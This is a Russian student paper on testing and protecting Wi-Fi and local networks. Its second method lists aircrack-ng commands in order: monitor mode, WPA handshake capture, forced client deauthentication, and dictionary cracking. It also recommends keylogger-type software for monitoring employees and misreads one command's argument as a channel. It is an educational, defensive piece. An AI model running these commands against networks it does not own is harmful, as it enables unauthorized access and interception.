УДК 004
Методы тестирования ЛВС на защищённость от проникновения
Научный руководитель Забержинский Борислав Эдуардович – кандидат технических наук, доцент кафедры информационных технологий Самарского государственного технического университета.
Поляков Егор Александрович – студент Самарского государственного технического университета.
Аннотация: Информационная безопасность является неотъемлемой частью нашей повседневной жизни. Эта работа представляет собой подход к тестированию безопасности Wi-Fi сети, при помощи использования специализированной ОС Kali Linux, и устройства с встроенным ПО и Wi-Fi модулем, в данном исследовании применялся личный ноутбук исследователя. Результаты данного исследования могут быть полезны для повышения уровня защиты Wi-Fi сетей и обеспечения конфиденциальности данных пользователей. Дальнейшие шаги включают в себя тестирование предложенных мер безопасности и анализ их эффективности в защите Wi-Fi сетей от потенциальных кибератак.
Ключевые слова: информационная безопасность, безопасность сети, ЛВС, пароль, Wi-Fi, вредоносное ПО, кибератаки.
С каждым годом количество хакерских атак, DDoS атак и других воздействий на информационные системы растёт. Любая организация с построенной IT-инфраструктурой подвержены хакерским атакам: APT-атаки, вредоносные программы, вредоносное ПО, Dos или DDOS атаки, взломы, программы вымогатели, фишинг, спуфинг [1], что влияет на конфиденциальность персональных данных и коммерческой тайне. Кроме того, нельзя исключать варианты взлома частных и домашних wi-fi сетей. Каждому важна конфиденциальность и безопасность его личных данных. Есть множество способов защиты домашней wi-fi сети. Так как различных угроз безопасности информации с каждым годом все больше и больше, то необходимо найти методы защиты информации. В этой статье будет рассмотрено несколько возможных способов защиты для своевременного выявления хакерской атаки, защиты личных данных, нахождения нежелательного пользователя сети и мониторинга системы.
В статье рассматривается сетевая безопасность как важная вещь в работе любой компании. Вопрос безопасности данных будет актуален как для небольшого предприятия с небольшим документооборотом, так и для крупной корпорации. Есть множество технологий защиты, к сожалению, самый ненадежный способ защиты – человек, поэтому было создано множество автоматических систем защит: Антивирус, WAF, Брандмауэр Windows и т.д. Однако, нельзя исключать, что антивирус можно выключить, системы безопасности можно обойти, человек сможет работать с данными несмотря на антивирус или выключенную систему защиты. Грамотный специалист сможет вовремя прервать соединение при DDoS атаке, или увидеть перехват соединения и многое другое. Для организации это деньги, для человека – время на обучение.
Поэтому сегодня мы рассмотрим несколько способов как защитить данные в сети. Сначала рассмотрим способы защиты от внешних угроз, затем от возможных внутренних угроз на предприятии.
Внешние угрозы:
Способ 1:
Настроить постоянный мониторинг роутера, маршрутизатора или иного устройства, через которое пользуются интернетом.
Стандартный IP-адрес для большинства роутеров 192.168.0.1 или (192.168.1.1). Чтобы узнать состояние сети, количество активных пользователей в ней, необходимо зайти в браузер и ввести этот IP-адрес в адресную строку (Рис. 1).
Рисунок 1. Мониторинг домашнего роутера
Производители обычно ставят утилиту для мониторинга подключённых клиентов, благодаря этому вы можете видеть:
- Количество подключённых устройств;
- Их IP-адрес в сети.
Этой информации уже достаточно чтобы предпринять какие-либо действия. Если вы заметили, что пользователей больше нужного количества, то необходимо сменить пароль или вернуть роутер до заводских настроек. Это самый простой и рабочий способ в домашних условиях, или на малом предприятии. Кроме того некоторые производители (например роутеры компании tp-link[2]) предоставляют возможность настроить получение уведомлений о подключении пользователей к сети. Данная функция позволит как можно быстрее выявить злоумышленника и предотвратить внешнее воздействие на систему.
Способ 2:
Выявление уязвимости при помощи Kali Linux.
Kali Linux — это дистрибутив операционной системы Linux. Это одна из немногих систем, которая предназначена для специалистов информационной безопасности. В неё входит ряд утилит, которые созданы для тестирования уязвимостей. Kali Linux редко используется как основная ОС, чаще всего она устанавливается как гостевая.[3]
Возможности Kali Linux действительно впечатляют с помощью консоли Kali Linux можно просканировать сеть и взломать её. Это делается следующими командами в терминале:
- airmon-ng
Эта команда выведет информацию о сетевых интерфейсах.
- airmon-ng start wlan0
Так как Kali Linux по умолчанию присваивает адаптеру беспроводной сети это имя: «wlan 0», то его и будем использовать. Данная команда переводит адаптер в режим мониторинга.
- airodump-ng wlan0mon
Данная команда запускает WI-FI адаптер в режиме мониторинга. Устройство начинает получать сигнал от всех видимых WI-FI сетей.
- airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]
В ней [channel] - номер целевого канала, [bssid] — целевой BSSID, [monitor interface] — интерфейс мониторинга wlan0mon.
5. airodump-ng -c 6 –bssid 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ wlan0monКоманда выше приведена в качестве примера. Выполняя её мы ждём подключения к сети, как только это происходит, мы получаем «рукопожатие» и можем взломать сеть.6. aireplay-ng -0 2 -a [router bssid] -c [client bssid] wlan0monЗдесь [router bssid] - BSSID Wi-Fi-сети, а [client bssid] — идентификатор рабочей станции.Эта команда позволяет получить handshake-данные в том случае, если вам не хочется ждать момента чьего-либо подключения к сети. Команда №6 перехватывает сигнал на маршрутизаторе, выполняя внедрение пакетов. Цифра 0 обозначает выполнить деаутентификацию, а команда 2 – канал для подключения. В результате выполнения этой команды получим handshake-данные.7. aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.capГде a2 - означает WPA, b — это BSSID сети, w — это путь к списку паролей, .cap — это шаблон имён файлов, содержащих пароли.В итоге сеть взламывается.ИлиВыполняем следующие команды после 6 команды- aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon - wpaclean ИмяНовогоФайла ИмяСтарогоФайла - aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]Здесь мы используем словари для подбора пароля, это лучший способ для проверки пароля на качество, чем дольше подбирается пароль, тем лучше сеть защищена. Сеть может быть и вовсе не взломана, тогда это отличный показатель.Способ 3:Защита сети при помощи самостоятельно созданного брандмауэра. В данном способе есть 2 варианта развития событий:1. Установить бесплатный или платный брандмауэр.[4]2. Создать свой собственный брандмауэр. Более подробно процесс создания собственного брандмауэра описано на ресурсе[5]
Внутренние угрозы:
Под внутренними угрозами будем понимать использование доступа к глобальной сети интернет не по назначению. А именно поиск сайтов с играми, музыкой, видео и другим развлекательным контентом на рабочем месте.Способ 1:Покупка и настройка коммутатора доступа. Цена коммутатора может варьироваться от 2 899 рублей до 205 999 рублей. Настройка коммутатора обойдётся примерно в 3000 рублей.Это позволит на уровне сети ограничить доступ и контролировать трафик.Способ 2:С помощью регламентов.Самый простой, но не действенный способ. Подразумевает запрет доступа к развлекательным и иным сайтам в сети интернет при помощи юридического запрета.Люди часто обманывают, и уж тем более на работе. Однако, при этом, хорошая документация ИБ – залог качества информационной безопасности на предприятии. Обычно она имеет иерархическую структуру по следующему принципу (Рис. 2):
Рисунок 2. Схема документации по информационной безопасности на предприятии.
Способ 3:ПрограммныйКонтролировать сеть можно и с помощью специального ПО. Например администратор сети, или директор предприятия устанавливает данное ПО и может видеть, чем занимается каждый сотрудник. В данной статье[6] приведены программы как раз для этого.Наилучшими вариантами являются:· Golden Keylogger;· StaffCop;· Zabbix;
Таблица 1. Сравнительная таблица специального ПО для отслеживания действий пользователей в сети.
Характеристика | Golden Keylogger | StaffCop | Zabbix |
Тип программы | Отслеживание действий сотрудников | Мониторинг активности сотрудников | Мониторинг сети и серверов |
Функциональность | · Запись нажатий клавиш, скриншоты· Отслеживание нажатий клавиш | · Отслеживание активности, блокировка приложений· Контроль действий сотрудников на компьютере | · Мониторинг производительности и доступности сети· Мониторинг сетевых устройств, уведомления об ошибках |
Платформа | Windows | Windows | Кроссплатформенный |
Лицензия | Платная | Платная | Бесплатная и платная |
Как было показано в статье, существует множество угроз информационной безопасности. Но нам удалось достичь поставленных целей: найти способы бороться как с внутренними, так и с внешними уязвимостями. Используя приведя данные способы на предприятии и не только, можно свести к минимуму потерю информации, а также время расследований инцидентов, связанных с утечкой информации. Данная статья будет полезна для общего ознакомления сотрудникам отдела информационной безопасности или начинающим программистам. Нельзя исключать и появления новых угроз. Поэтому необходимо постоянно соблюдать все рекомендации для увеличения уровня информационной безопасности.
Список литературы
- «Кибертерроризм: виды атак, хакеров и их влияния на цели» SecurityLab.ru [Электронный ресурс]. URL: https://www.securitylab.ru/analytics/534885.php
- «Как установить Kali Linux на VirtualBox» help.reg.ru [Электронный ресурс]. URL: https://help.reg.ru/support/vydelennyye-servery-i-dc/vmware-virtualnyy-data-tsentr/sozdaniye-i-nastroyka-virtualnykh-mashin/kak-ustanovit-kali-linux-na-virtualbox
- «Взлом Wi-Fi-сетей, защищённых WPA и WPA2» Habr [Электронный ресурс]. URL: https://habr.com/ru/companies/ruvds/articles/534112/
- «8 лучших бесплатных брандмауэров для Windows» tunecom.ru [Электронный ресурс]. URL: https://tunecom.ru/security/1878-brandmaujery-dlja-windows.html
- «Build Your Own Firewall Step by Step» BrightHub [Электронный ресурс]. URL: https://www.brighthub.com/computing/smb-security/articles/46668/#extras--next-steps
- «ТОП-10 программ для контроля сетевых подключений» staffcop [Электронный ресурс]. URL: https://www.staffcop.ru/blog/top-10-programm-dlya-kontrolya-setevyh-podklyuchenij/